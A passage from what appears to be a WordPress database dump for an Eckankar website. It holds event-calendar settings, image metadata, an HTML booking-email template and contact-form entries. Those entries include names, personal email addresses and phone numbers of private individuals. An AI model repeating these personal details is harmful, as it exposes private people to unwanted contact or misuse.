:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(169518,267211,'mec_read_more',''),(169506,267207,'_thumbnail_id','267208'),(169507,267208,'original-file','2022/09/golden-heart-2-updraft-pre-smush-original.jpg'),(169508,267208,'smush-info','The file was compressed from 39.42 KB to 38.34 KB saving 2.76 percent using WP-Optimize'),(169509,267208,'smush-complete','1'),(169510,267208,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:40371;s:12:\"smushed-size\";i:39256;s:15:\"savings-percent\";d:2.76;s:10:\"sizes-info\";a:6:{s:4:\"full\";a:2:{s:8:\"original\";i:40371;s:10:\"compressed\";i:39256;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:5335;s:10:\"compressed\";i:5269;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:14124;s:10:\"compressed\";i:14124;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:20900;s:10:\"compressed\";i:20900;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:15386;s:10:\"compressed\";i:15386;}s:8:\"tileview\";a:2:{s:8:\"original\";i:16799;s:10:\"compressed\";i:16799;}}}'),(188220,268837,'mec_reg_fields_global_inheritance','1'),(188221,268837,'mec_reg_fields','a:0:{}'),(169513,267211,'protect_children',''),(169514,267211,'mec_color',''),(169515,267211,'mec_location_id','131'),(169516,267211,'mec_dont_show_map','0'),(169517,267211,'mec_organizer_id','1'),(169519,267211,'mec_more_info',''),(169520,267211,'mec_more_info_title',''),(169521,267211,'mec_more_info_target','_self'),(169522,267211,'mec_cost',''),(169523,267211,'mec_currency','a:0:{}'),(169524,267211,'mec_additional_organizer_ids','a:0:{}'),(169525,267211,'mec_additional_location_ids','a:0:{}'),(169526,267211,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-09-25\";s:4:\"hour\";s:1:\"1\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-09-25\";s:4:\"hour\";s:1:\"2\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(169527,267211,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(169528,267211,'mec_certain_weekdays','a:0:{}'),(169529,267211,'mec_allday','0'),(169530,267211,'one_occurrence','0'),(169531,267211,'mec_hide_time','0'),(169532,267211,'mec_hide_end_time','0'),(169533,267211,'mec_comment',''),(169534,267211,'mec_timezone','global'),(169535,267211,'mec_countdown_method','global'),(169536,267211,'mec_public','1'),(169537,267211,'mec_start_date','2022-09-25'),(169538,267211,'mec_start_time_hour','1'),(169539,267211,'mec_start_time_minutes','0'),(169540,267211,'mec_start_time_ampm','PM'),(169541,267211,'mec_start_day_seconds','46800'),(169542,267211,'mec_end_date','2022-09-25'),(169543,267211,'mec_end_time_hour','2'),(169544,267211,'mec_end_time_minutes','30'),(169545,267211,'mec_end_time_ampm','PM'),(169546,267211,'mec_end_day_seconds','52200'),(169547,267211,'mec_repeat_status','0'),(169548,267211,'mec_repeat_type',''),(169549,267211,'mec_repeat_interval','1'),(169550,267211,'mec_repeat_end',''),(169551,267211,'mec_repeat_end_at_occurrences',''),(169552,267211,'mec_repeat_end_at_date',''),(169553,267211,'mec_advanced_days','a:0:{}'),(169554,267211,'mec_in_days',''),(169555,267211,'mec_not_in_days',''),(169556,267211,'mec_hourly_schedules','a:0:{}'),(169557,267211,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(169558,267211,'mec_tickets','a:0:{}'),(169559,267211,'mec_fees_global_inheritance','1'),(169560,267211,'mec_fees','a:0:{}'),(169561,267211,'mec_ticket_variations_global_inheritance','1'),(169562,267211,'mec_ticket_variations','a:0:{}'),(169563,267211,'mec_reg_fields_global_inheritance','1'),(169564,267211,'mec_reg_fields','a:0:{}'),(169565,267211,'mec_bfixed_fields','a:0:{}'),(169566,267211,'mec_op','a:0:{}'),(169567,267211,'mec_fields','a:0:{}'),(169568,267211,'mec_event_status','EventScheduled'),(169569,267211,'mec_moved_online_link',''),(169570,267211,'mec_cancelled_reason',''),(169571,267211,'mec_display_cancellation_reason_in_single_page',''),(169572,267211,'boldgrid_hide_page_title','0'),(169573,267211,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(169574,267211,'passster_activate_global_protection',NULL),(169575,267211,'passster_activate_protection',NULL),(169576,267211,'passster_protection_type','password'),(169577,267211,'boldgrid_in_page_containers','1'),(169578,267211,'_dp_original','265240'),(169579,267211,'_edit_lock','1663089461:2'),(169580,267211,'_edit_last','2'),(169581,267212,'_wp_attached_file','2022/09/create-dreams-1.jpg'),(169582,267212,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:780;s:6:\"height\";i:439;s:4:\"file\";s:27:\"2022/09/create-dreams-1.jpg\";s:8:\"filesize\";i:77245;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:27:\"create-dreams-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13238;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:27:\"create-dreams-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6256;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:27:\"create-dreams-1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:61118;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:27:\"create-dreams-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19241;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:27:\"create-dreams-1-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:31688;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:27:\"create-dreams-1-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22689;}s:8:\"tileview\";a:5:{s:4:\"file\";s:27:\"create-dreams-1-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23260;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(169583,267211,'_thumbnail_id','267212'),(169584,267212,'original-file','2022/09/create-dreams-1-updraft-pre-smush-original.jpg'),(169585,267212,'smush-info','The file was compressed from 75.43 KB to 72.67 KB saving 3.66 percent using WP-Optimize'),(169586,267212,'smush-complete','1'),(169587,267212,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:77245;s:12:\"smushed-size\";i:74418;s:15:\"savings-percent\";d:3.66;s:10:\"sizes-info\";a:7:{s:4:\"full\";a:2:{s:8:\"original\";i:77245;s:10:\"compressed\";i:74418;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:6256;s:10:\"compressed\";i:6190;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:61118;s:10:\"compressed\";i:59999;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:19241;s:10:\"compressed\";i:19069;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:31688;s:10:\"compressed\";i:31248;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:22689;s:10:\"compressed\";i:22386;}s:8:\"tileview\";a:2:{s:8:\"original\";i:23260;s:10:\"compressed\";i:23079;}}}'),(169588,267214,'_field_133','Heinz'),(169589,267214,'_field_134','Panholzer'),(169590,267214,'_field_135','heinz@panholzer.com'),(169591,267214,'_field_137','Sharing Room during World Wide Seminar '),(169592,267214,'_field_138','Dear ECKists,\n\nAs ECKist from Austria I visited the ECKANKAR Center in Loveland several times a few years ago.\nI will attend the World Wide Seminar in Minneapolis and I am looking for one or two ECKists to share a hotel room with.\nI would be glad if you could give me some relevant contacts.\nThank you!\n\nMy eMail: heinz@panholzer.com\n\nBest regards,\n\nHeinz Panholzer'),(169593,267214,'_form_id','13'),(169594,267214,'_seq_num','116'),(193977,269250,'_seq_num','89'),(193978,269251,'_field_654','Nancy'),(193979,269251,'_field_652','Bell'),(193980,269251,'_field_653','momnancybell@gmail.com'),(193981,269251,'_field_651','(407) 212-8381'),(193982,269251,'_field_656','The ECK Dream 2 Discourses - STARTS IN NOVEMBER - 3rd Monday at 700 pm - Zoom -  Zoom'),(193983,269251,'_field_649',''),(193984,269251,'_form_id','61'),(193975,269250,'_field_649',''),(193687,269203,'_field_652','Garland'),(191765,269099,'_field_654','Lynn'),(193688,269203,'_field_653','HuuSinger@comcast.net'),(193689,269203,'_field_651','(303) 324-3300'),(169611,267217,'_wp_attached_file','2022/09/fall-leaves-close-9.jpg'),(169612,267217,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1606;s:6:\"height\";i:760;s:4:\"file\";s:31:\"2022/09/fall-leaves-close-9.jpg\";s:8:\"filesize\";i:289723;s:5:\"sizes\";a:9:{s:6:\"medium\";a:5:{s:4:\"file\";s:31:\"fall-leaves-close-9-300x142.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:142;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18484;}s:5:\"large\";a:5:{s:4:\"file\";s:32:\"fall-leaves-close-9-1024x485.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:485;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:122824;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:31:\"fall-leaves-close-9-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9596;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:31:\"fall-leaves-close-9-768x363.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:363;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:79122;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:31:\"fall-leaves-close-9-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:27869;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:31:\"fall-leaves-close-9-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:45590;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:31:\"fall-leaves-close-9-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:33303;}s:8:\"tileview\";a:5:{s:4:\"file\";s:31:\"fall-leaves-close-9-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:32910;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:32:\"fall-leaves-close-9-1536x727.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:727;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:227845;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(169616,267219,'mec_color',''),(169617,267219,'mec_location_id','122'),(169618,267219,'mec_dont_show_map','0'),(169619,267219,'mec_organizer_id','1'),(169620,267219,'mec_read_more',''),(169621,267219,'mec_more_info',''),(169622,267219,'mec_more_info_title',''),(169623,267219,'mec_more_info_target','_self'),(169624,267219,'mec_cost',''),(169625,267219,'mec_currency','a:0:{}'),(169626,267219,'mec_additional_organizer_ids','a:0:{}'),(169627,267219,'mec_additional_location_ids','a:0:{}'),(169628,267219,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-10-30\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-10-30\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(169629,267219,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(169630,267219,'mec_certain_weekdays','a:0:{}'),(169631,267219,'mec_allday','0'),(169632,267219,'one_occurrence','0'),(169633,267219,'mec_hide_time','0'),(169634,267219,'mec_hide_end_time','0'),(169635,267219,'mec_comment',''),(169636,267219,'mec_timezone','global'),(169637,267219,'mec_countdown_method','global'),(169638,267219,'mec_public','1'),(169639,267219,'mec_start_date','2022-10-30'),(169640,267219,'mec_start_time_hour','10'),(169641,267219,'mec_start_time_minutes','30'),(169642,267219,'mec_start_time_ampm','AM'),(169643,267219,'mec_start_day_seconds','37800'),(169644,267219,'mec_end_date','2022-10-30'),(169645,267219,'mec_end_time_hour','11'),(169646,267219,'mec_end_time_minutes','30'),(169647,267219,'mec_end_time_ampm','AM'),(169648,267219,'mec_end_day_seconds','41400'),(169649,267219,'mec_repeat_status','0'),(169650,267219,'mec_repeat_type',''),(169651,267219,'mec_repeat_interval','1'),(169652,267219,'mec_repeat_end',''),(169653,267219,'mec_repeat_end_at_occurrences',''),(169654,267219,'mec_repeat_end_at_date',''),(169655,267219,'mec_advanced_days','a:0:{}'),(169656,267219,'mec_in_days',''),(169657,267219,'mec_not_in_days',''),(169658,267219,'mec_hourly_schedules','a:0:{}'),(169659,267219,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(169660,267219,'mec_tickets','a:0:{}'),(169661,267219,'mec_fees_global_inheritance','1'),(169662,267219,'mec_fees','a:0:{}'),(169663,267219,'mec_ticket_variations_global_inheritance','1'),(169664,267219,'mec_ticket_variations','a:0:{}'),(169665,267219,'mec_reg_fields_global_inheritance','1'),(169666,267219,'mec_reg_fields','a:0:{}'),(169667,267219,'mec_bfixed_fields','a:0:{}'),(169668,267219,'mec_op','a:0:{}'),(169669,267219,'mec_fields','a:0:{}'),(169670,267219,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(169671,267219,'mec_event_status','EventScheduled'),(169672,267219,'mec_moved_online_link',''),(169673,267219,'mec_cancelled_reason',''),(169674,267219,'mec_display_cancellation_reason_in_single_page',''),(169675,267219,'protect_children',''),(169676,267219,'passster_activate_global_protection',NULL),(169677,267219,'passster_activate_protection',NULL),(169678,267219,'passster_protection_type','password'),(169679,267219,'boldgrid_hide_page_title','0'),(169680,267219,'_thumbnail_id','267220'),(169683,267219,'_dp_original','266311'),(169682,267219,'boldgrid_in_page_containers','1'),(169684,267219,'_edit_lock','1663186296:2'),(169685,267219,'_edit_last','2'),(169686,267220,'_wp_attached_file','2022/09/nature-bench-light-1.jpg'),(169687,267220,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:707;s:6:\"height\";i:442;s:4:\"file\";s:32:\"2022/09/nature-bench-light-1.jpg\";s:8:\"filesize\";i:113884;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:32:\"nature-bench-light-1-300x188.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:188;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19842;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:32:\"nature-bench-light-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8562;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:32:\"nature-bench-light-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:28678;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:32:\"nature-bench-light-1-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:47676;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:32:\"nature-bench-light-1-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:32986;}s:8:\"tileview\";a:5:{s:4:\"file\";s:32:\"nature-bench-light-1-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:36004;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(169688,267222,'mec_color',''),(169689,267222,'mec_location_id','118'),(169690,267222,'mec_dont_show_map','0'),(169691,267222,'mec_organizer_id','1'),(169692,267222,'mec_read_more',''),(169693,267222,'mec_more_info',''),(169694,267222,'mec_more_info_title',''),(169695,267222,'mec_more_info_target','_self'),(169696,267222,'mec_cost',''),(169697,267222,'mec_currency','a:0:{}'),(169698,267222,'mec_additional_organizer_ids','a:0:{}'),(169699,267222,'mec_additional_location_ids','a:0:{}'),(169700,267222,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-10-08\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-10-08\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(169701,267222,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(169702,267222,'mec_certain_weekdays','a:0:{}'),(169703,267222,'mec_allday','0'),(169704,267222,'one_occurrence','0'),(169705,267222,'mec_hide_time','0'),(169706,267222,'mec_hide_end_time','0'),(169707,267222,'mec_comment',''),(169708,267222,'mec_timezone','global'),(169709,267222,'mec_countdown_method','global'),(169710,267222,'mec_public','1'),(169711,267222,'mec_start_date','2022-10-08'),(169712,267222,'mec_start_time_hour','10'),(169713,267222,'mec_start_time_minutes','30'),(169714,267222,'mec_start_time_ampm','AM'),(169715,267222,'mec_start_day_seconds','37800'),(169716,267222,'mec_end_date','2022-10-08'),(169717,267222,'mec_end_time_hour','11'),(169718,267222,'mec_end_time_minutes','30'),(169719,267222,'mec_end_time_ampm','PM'),(169720,267222,'mec_end_day_seconds','84600'),(169721,267222,'mec_repeat_status','0'),(169722,267222,'mec_repeat_type',''),(169723,267222,'mec_repeat_interval','1'),(169724,267222,'mec_repeat_end',''),(169725,267222,'mec_repeat_end_at_occurrences',''),(169726,267222,'mec_repeat_end_at_date',''),(169727,267222,'mec_advanced_days','a:0:{}'),(169728,267222,'mec_in_days',''),(169729,267222,'mec_not_in_days',''),(169730,267222,'mec_hourly_schedules','a:0:{}'),(169731,267222,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:1:\"1\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(169732,267222,'mec_tickets','a:0:{}'),(169733,267222,'mec_fees_global_inheritance','1'),(169734,267222,'mec_fees','a:0:{}'),(169735,267222,'mec_ticket_variations_global_inheritance','1'),(169736,267222,'mec_ticket_variations','a:0:{}'),(169737,267222,'mec_reg_fields_global_inheritance','1'),(169738,267222,'mec_reg_fields','a:0:{}'),(169739,267222,'mec_bfixed_fields','a:0:{}'),(169740,267222,'mec_op','a:0:{}'),(169741,267222,'mec_fields','a:0:{}'),(169742,267222,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:27:\"Eckankar Event Registration\";s:7:\"content\";s:6107:\"<p>\r\n<style>\r\n    table, td, div, h1, p \r\n      font-family: Arial, sans-serif;\r\n    }\r\n    @media screen and (max-width: 530px) {<br />\r\n      .unsub {<br />\r\n        display: block;<br />\r\n        padding: 8px;<br />\r\n        margin-top: 14px;<br />\r\n        border-radius: 6px;<br />\r\n        background-color: #555555;<br />\r\n        text-decoration: none !important;<br />\r\n        font-weight: bold;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 100% !important;<br />\r\n      }<br />\r\n    }<br />\r\n    @media screen and (min-width: 531px) {<br />\r\n      .col-sml {<br />\r\n        max-width: 27% !important;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 73% !important;<br />\r\n      }<br />\r\n    }<br />\r\n  </style>\r\n</p>\r\n<p>&nbsp;</p>\r\n<div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; background-color: #ffffff;\" lang=\"en\">\r\n<table style=\"width: 100%; border: none; border-spacing: 0;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0;\" align=\"center\"><!-- [if mso]></p>\r\n<table role=\"presentation\" align=\"center\" style=\"width:600px;\">\r\n<tr>\r\n<td>\r\n<p>          <![endif]-->\r\n<table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 0px 10px 0px; background-color: #ffffff; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\"><img class=\"alignnone wp-image-266520 size-full\" 